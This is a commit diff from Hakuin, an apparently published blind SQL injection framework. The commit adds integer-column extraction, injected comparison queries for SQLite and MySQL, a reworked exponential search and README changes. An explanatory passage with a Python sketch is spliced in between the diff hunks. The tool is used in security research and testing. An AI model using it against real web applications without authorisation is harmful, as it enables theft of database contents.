integer columns extraction, readme update, logo background

2024-09-08 03:30:41 +02:00 · 2023-10-29 17:05:38 +08:00 · 2023-10-29 17:05:38 +08:00 · dc0bc22682
commit dc0bc22682
parent 30c08a8a44
13 changed files with 169 additions and 51 deletions
--- a/README.md
+++ b/README.md
@ -2,13 +2,14 @@
    <img width="150" src="https://raw.githubusercontent.com/pruzko/hakuin/main/logo.png">
 </p>

-Hakuin is a Blind SQL Injection (BSQLI) inference optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract textual data in databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for DB content.
+Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for textual DB content.

-Hakuin been presented at academic and industrial conferences:
- [IEEE Workshop on Offsensive Technology (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023
+Hakuin has been presented at esteemed academic and industrial conferences:
+- [BlackHat MEA, Riyadh](https://blackhatmea.com/session/hakuin-injecting-brain-blind-sql-injection), 2023
 - [Hack in the Box, Phuket](https://conference.hitb.org/hitbsecconf2023hkt/session/hakuin-injecting-brains-into-blind-sql-injection/), 2023
+- [IEEE S&P Workshop on Offensive Technology (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023

-Also, make sure to read our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) or see the [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf).
+More information can be found in our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) and [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf).


 ## Installation
@ -48,9 +49,9 @@ class ContentRequester(Requester):
        return 'found' in r.content.decode()
 ```

-To start infering data, use the `Extractor` class. It requires a `DBMS` object to contruct queries and a `Requester` object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`.
+To start extracting data, use the `Extractor` class. It requires a `DBMS` object to construct queries and a `Requester` object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`.

-##### Example 1 - Inferring SQLite DBs
+##### Example 1 - Extracting SQLite DBs
 ```python
 from hakuin.dbms import SQLite
 from hakuin import Extractor, Requester
@ -58,43 +59,43 @@ from hakuin import Extractor, Requester
 class StatusRequester(Requester):
    ...

-exf = Extractor(requester=StatusRequester(), dbms=SQLite())
+ext = Extractor(requester=StatusRequester(), dbms=SQLite())
 ```

-##### Example 2 - Inferring MySQL DBs
+##### Example 2 - Extracting MySQL DBs
 ```python
 from hakuin.dbms import MySQL
 ...
-exf = Extractor(requester=StatusRequester(), dbms=MySQL())
+ext = Extractor(requester=StatusRequester(), dbms=MySQL())
 ```

-Now that eveything is set, you can start inferring DB schemas.
+Now that everything is set, you can start extracting DB schemas.

-##### Example 1 - Inferring DB Schemas
+##### Example 1 - Extracting DB Schemas
 ```python
 # strategy:
 #   'binary':   Use binary search
 #   'model':    Use pre-trained models
-schema = exf.extract_schema(strategy='model')
+schema = ext.extract_schema(strategy='model')
 ```

-##### Example 2 - Inferring DB Schemas with Metadata
+##### Example 2 - Extracting DB Schemas with Metadata
 ```python
 # metadata:
 #   True:   Detect column settings (data type, nullable, primary key)
 #   False:  Pass
-schema = exf.extract_schema(strategy='model', metadata=True)
+schema = ext.extract_schema(strategy='model', metadata=True)
 ```

-##### Example 3 - Inferring only Table/Column Names
+##### Example 3 - Extracting only Table/Column Names
 ```python
-tables = exf.extract_table_names(strategy='model')
-columns = exf.extract_column_names(table='users', strategy='model')
+tables = ext.extract_table_names(strategy='model')
+columns = ext.extract_column_names(table='users', strategy='model')
 ```

 Once you know the schema, you can extract the actual content.

-##### Example 1 - Inferring Textual Columns
+##### Example 1 - Extracting Textual Columns
 ```python
 # strategy:
 #   'binary':       Use binary search
@ -102,7 +103,12 @@ Once you know the schema, you can extract the actual content.
 #   'unigram':      Use unigram model
 #   'dynamic':      Dynamically identify the best strategy. This setting
 #                   also enables opportunistic guessing.
-res = exfiltrate_text_data(table='users', column='address', strategy='dynamic'):
+res = ext.extract_column_text(table='users', column='address', strategy='dynamic')
+```
+
+##### Example 2 - Extracting Integer Columns
+```python
+res = ext.extract_column_int(table='users', column='id')
 ```

 More examples can be found in the `tests` directory.
@ -110,7 +116,7 @@ More examples can be found in the `tests` directory.


 ## For Researchers
-This repository is maintained to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
+This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.


 #### Cite Hakuin
--- a/hakuin/Extractor.py
+++ b/hakuin/Extractor.py
@ -25,7 +25,7 @@ class Extractor:
                            models with Huffman trees

        Returns:
-            list: List of extracted table names
+            list: list of extracted table names
        '''
        allowed = ['binary', 'model']
        assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
@ -35,8 +35,10 @@ class Extractor:
        n_rows = search_alg.IntExponentialBinarySearch(
            requester=self.requester,
            query_cb=self.dbms.TablesQueries.rows_count,
+            lower=0,
            upper=8,
-            find_range=True,
+            find_lower=False,
+            find_upper=True,
        ).run(ctx)

        if strategy == 'binary':
@ -61,7 +63,7 @@ class Extractor:
                        models with Huffman trees

        Returns:
-            list: List of extracted column names
+            list: list of extracted column names
        '''
        allowed = ['binary', 'model']
        assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
@ -71,8 +73,10 @@ class Extractor:
        n_rows = search_alg.IntExponentialBinarySearch(
            requester=self.requester,
            query_cb=self.dbms.ColumnsQueries.rows_count,
+            lower=0,
            upper=8,
-            find_range=True,
+            find_lower=False,
+            find_upper=True,
        ).run(ctx)

        if strategy == 'binary':
@ -137,7 +141,7 @@ class Extractor:
        return schema


-    def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128):
+    def extract_column_text(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128):
        '''Extracts text column.

        Params:
@ -152,7 +156,7 @@ class Extractor:
            n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set

        Returns:
-            list: List of strings in the column
+            list: list of strings in the column
        '''
        allowed = ['binary', 'unigram', 'fivegram', 'dynamic']
        assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
@ -161,8 +165,10 @@ class Extractor:
        n_rows = search_alg.IntExponentialBinarySearch(
            requester=self.requester,
            query_cb=self.dbms.RowsQueries.rows_count,
+            lower=0,
            upper=n_rows_guess,
-            find_range=True,
+            find_lower=False,
+            find_upper=True,
        ).run(ctx)

        if strategy == 'binary':
@ -185,3 +191,30 @@ class Extractor:
                queries=self.dbms.RowsQueries,
                charset=charset,
            ).run(ctx, n_rows)
+
+
+    def extract_column_int(self, table, column, n_rows_guess=128):
+        '''Extracts integer column.
+
+        Params:
+            table (str): table name
+            column (str): column name
+            n_rows_guess (int|None): approximate number of rows, used as the initial upper bound of the row-count search
+
+        Returns:
+            list: list of integers in the column
+        '''
+        ctx = search_alg.Context(table, column, None, None)
+        n_rows = search_alg.IntExponentialBinarySearch(
+            requester=self.requester,
+            query_cb=self.dbms.RowsQueries.rows_count,
+            lower=0,
+            upper=n_rows_guess,
+            find_lower=False,
+            find_upper=True,
+        ).run(ctx)
+
+        return collect.IntCollector(
+                requester=self.requester,
+                queries=self.dbms.RowsQueries,
+        ).run(ctx, n_rows)
--- a/hakuin/collectors.py
+++ b/hakuin/collectors.py
@ -60,6 +60,22 @@ class Collector(metaclass=ABCMeta):
        raise NotImplementedError()


+class IntCollector(Collector):
+    '''Collector for integer columns.'''
+    def __init__(self, requester, queries):
+        super().__init__(requester, queries)
+
+
+    def collect_row(self, ctx):
+        return IntExponentialBinarySearch(
+            requester=self.requester,
+            query_cb=self.queries.int,
+            lower=0,
+            upper=128,
+            find_lower=True,
+            find_upper=True,
+        ).run(ctx)
+

 class TextCollector(Collector):
    '''Collector for text columns.'''
@ -218,7 +234,8 @@ class BinaryTextCollector(TextCollector):
            query_cb=self.queries.char_unicode,
            lower=ASCII_MAX + 1,
            upper=UNICODE_MAX + 1,
-            find_range=False,
+            find_lower=False,
+            find_upper=False,
            correct=correct_ord,
        )
        res = search_alg.run(ctx)
--- a/hakuin/dbms/MySQL.py
+++ b/hakuin/dbms/MySQL.py
@ -293,6 +293,16 @@ class MySQLRowsQueries(UniformQueries):
        return self.normalize(query)


+    def int(self, ctx, n):
+        query = f'''
+            SELECT  {MySQL.escape(ctx.column)} < {n}
+            FROM    {MySQL.escape(ctx.table)}
+            LIMIT   1
+            OFFSET  {ctx.row}
+        '''
+        return self.normalize(query)
+
+

 class MySQL(DBMS):
    DATA_TYPES = [
--- a/hakuin/dbms/SQLite.py
+++ b/hakuin/dbms/SQLite.py
@ -278,6 +278,14 @@ class SQLiteRowsQueries(UniformQueries):
        return self.normalize(query)


+    def int(self, ctx, n):
+        query = f'''
+            SELECT  {SQLite.escape(ctx.column)} < {n}
+            FROM    {SQLite.escape(ctx.table)}
+            LIMIT   1
+            OFFSET  {ctx.row}
+        '''
+        return self.normalize(query)



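The `int` query added above answers a single yes/no question per request: is the value in row `ctx.row` smaller than `n`? A minimal sketch of that comparison, run against an in-memory SQLite database with the standard `sqlite3` module, is shown below. The `users` table, its values, the double-quote identifier quoting, and the `ORDER BY rowid` clause are assumptions made for illustration; the query in the diff has no `ORDER BY`, and the behaviour of `SQLite.escape` is not shown in this commit.

```python
import sqlite3

# Hypothetical table and data, used only to illustrate the comparison.
conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE users (id INTEGER)')
conn.executemany('INSERT INTO users VALUES (?)', [(7,), (42,), (-3,)])


def is_less(row: int, n: int) -> bool:
    """Return True if the value of "id" in the given row is smaller than n."""
    # ORDER BY rowid is added here for a deterministic row order; it is not
    # part of the query in the diff.
    query = (
        f'SELECT "id" < {n} FROM "users" '
        f'ORDER BY rowid LIMIT 1 OFFSET {row}'
    )
    (result,) = conn.execute(query).fetchone()
    # SQLite returns 1 or 0 for a comparison of non-NULL integers.
    return bool(result)


print(is_less(0, 8))   # row 0 holds 7
print(is_less(2, -3))  # row 2 holds -3
```

In a real injection the boolean would not be read directly but inferred from the response of the vulnerable application, which is the job of the `Requester`.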
--- a/hakuin/search_algorithms.py
+++ b/hakuin/search_algorithms.py
@ -44,7 +44,7 @@ class SearchAlgorithm(metaclass=ABCMeta):

 class IntExponentialBinarySearch(SearchAlgorithm):
    '''Exponential and binary search for integers.'''
-    def __init__(self, requester, query_cb, lower=0, upper=16, find_range=True, correct=None):
+    def __init__(self, requester, query_cb, lower=0, upper=16, find_lower=False, find_upper=True, correct=None):
        '''Constructor.

        Params:
@ -52,13 +52,15 @@ class IntExponentialBinarySearch(SearchAlgorithm):
            query_cb (function): query construction function
            lower (int): lower bound of search range
            upper (int): upper bound of search range
-            find_range (bool): exponentially expands range until the correct value is within 
+            find_lower (bool): exponentially expands the lower bound until the correct value is within the range
+            find_upper (bool): exponentially expands the upper bound until the correct value is within the range
            correct (int|None): correct value. If provided, the search is emulated
        '''
        super().__init__(requester, query_cb)
        self.lower = lower
        self.upper = upper
-        self.find_range = find_range
+        self.find_lower = find_lower
+        self.find_upper = find_upper
        self.correct = correct
        self.n_queries = 0

@ -74,29 +76,42 @@ class IntExponentialBinarySearch(SearchAlgorithm):
        '''
        self.n_queries = 0

-        if self.find_range:
-            lower, upper = self._find_range(ctx, lower=self.lower, upper=self.upper)
-        else:
-            lower, upper = self.lower, self.upper
+        if self.find_lower:
+            self._find_lower(ctx, self.upper - self.lower)
+        if self.find_upper:
+            self._find_upper(ctx, self.upper - self.lower)

-        return self._search(ctx, lower, upper)
+        return self._search(ctx, self.lower, self.upper)


-    def _find_range(self, ctx, lower, upper):
-        '''Exponentially expands the search range until the correct value is within.
+    def _find_lower(self, ctx, step):
+        '''Exponentially expands the lower bound until the correct value is within.

        Params:
            ctx (Context): extraction context
-            lower (int): lower bound
-            upper (int): upper bound
-
-        Returns:
-            int: correct upper bound
+            step (int): initial step
        '''
-        if self._query(ctx, upper):
-            return lower, upper
+        if not self._query(ctx, self.lower):
+            return

-        return self._find_range(ctx, upper, upper * 2)
+        self.upper = self.lower
+        self.lower -= step
+        self._find_lower(ctx, step * 2)
+
+
+    def _find_upper(self, ctx, step):
+        '''Exponentially expands the upper bound until the correct value is within.
+
+        Params:
+            ctx (Context): extraction context
+            step (int): initial step
+        '''
+        if self._query(ctx, self.upper):
+            return
+
+        self.lower = self.upper
+        self.upper += step
+        self._find_upper(ctx, step * 2)


    def _search(self, ctx, lower, upper):
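The split of `find_range` into `find_lower` and `find_upper` in the hunk above lets the search expand in both directions, which is what makes negative integers reachable. The following is a standalone sketch of that idea, not the project's implementation: the function name `find_int` and the oracle `is_less` are hypothetical, the recursion is replaced by loops, and the final binary search is an assumption because the body of `_search` is not part of this diff.

```python
from typing import Callable


def find_int(is_less: Callable[[int], bool], lower: int = 0, upper: int = 128) -> int:
    """Find the hidden integer v using only the oracle is_less(n) == (v < n)."""
    step = upper - lower

    # Expand the lower bound while v < lower, doubling the step each time.
    while is_less(lower):
        upper = lower
        lower -= step
        step *= 2

    # Expand the upper bound while v >= upper, doubling the step each time.
    while not is_less(upper):
        lower = upper
        upper += step
        step *= 2

    # Invariant from here on: lower <= v < upper. Halve the range until
    # a single candidate remains.
    while upper - lower > 1:
        middle = (lower + upper) // 2
        if is_less(middle):
            upper = middle
        else:
            lower = middle
    return lower


# Emulate the oracle locally for a few hidden values.
for hidden in (-1000, -1, 0, 127, 128, 10**6):
    assert find_int(lambda n, v=hidden: v < n) == hidden
```

Each call to `is_less` corresponds to one injected request, so values close to the initial `[lower, upper)` range are cheap, while the cost for far-away values grows only logarithmically with their distance.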
--- a/logo.png
+++ b/logo.png
--- a/tests/dbs/data_types.sqlite
+++ b/tests/dbs/data_types.sqlite
--- a/tests/test_data_types.py
+++ b/tests/test_data_types.py
@ -0,0 +1,28 @@
+import json
+import logging
+
+import hakuin
+from hakuin import Extractor
+from hakuin.dbms import SQLite
+
+from OfflineRequester import OfflineRequester
+
+
+
+logging.basicConfig(level=logging.INFO)
+
+
+
+def main():
+    requester = OfflineRequester(db='data_types', verbose=True)
+    ext = Extractor(requester=requester, dbms=SQLite())
+
+    # res = ext.extract_schema(strategy='binary')
+    # print(res)
+
+    res = ext.extract_column_int('data_types', 'integer')
+    
+
+
+if __name__ == '__main__':
+    main()
--- a/tests/test_large_content.py
+++ b/tests/test_large_content.py
@ -25,7 +25,7 @@ def main():
    ext = Extractor(requester=requester, dbms=SQLite())

    if len(sys.argv) == 3:
-        res = ext.extract_column(sys.argv[1], sys.argv[2])
+        res = ext.extract_column_text(sys.argv[1], sys.argv[2])
        print('Total requests:', requester.n_queries)
        print('Average RPC:', requester.n_queries / len(''.join(res)))
    else:
@ -43,7 +43,7 @@ def main():
        # measure rpc
        for table, columns in rpc.items():
            for column in columns:
-                res = ext.extract_column(table, column)
+                res = ext.extract_column_text(table, column)
                res_len = len(''.join(res))
                col_rpc = requester.n_queries / len(''.join(res))
                rpc[table][column] = (requester.n_queries, col_rpc)
--- a/tests/test_large_schema.py
+++ b/tests/test_large_schema.py
@ -13,7 +13,7 @@ logging.basicConfig(level=logging.INFO)


 def main():
-    requester = OfflineRequester(db='large_schema')
+    requester = OfflineRequester(db='large_schema', verbose=False)
    ext = Extractor(requester=requester, dbms=SQLite())

    res = ext.extract_schema()
--- a/tests/test_online.py
+++ b/tests/test_online.py
@ -47,7 +47,8 @@ def main():
        res = ext.extract_schema(strategy='model', metadata=True)
        print(json.dumps(res, indent=4))
    else:
-        res = ext.extract_column(table, column)
+        res = ext.extract_column_text(table, column)
+        # res = ext.extract_column_int(table, column)
        print(json.dumps(res, indent=4))


--- a/tests/test_unicode.py
+++ b/tests/test_unicode.py
@ -20,7 +20,7 @@ def main():
    res = ext.extract_schema(strategy='binary')
    print(res)

-    res = ext.extract_column('Ħ€ȽȽ©', 'ŴǑȒȽƉ')
+    res = ext.extract_column_text('Ħ€ȽȽ©', 'ŴǑȒȽƉ')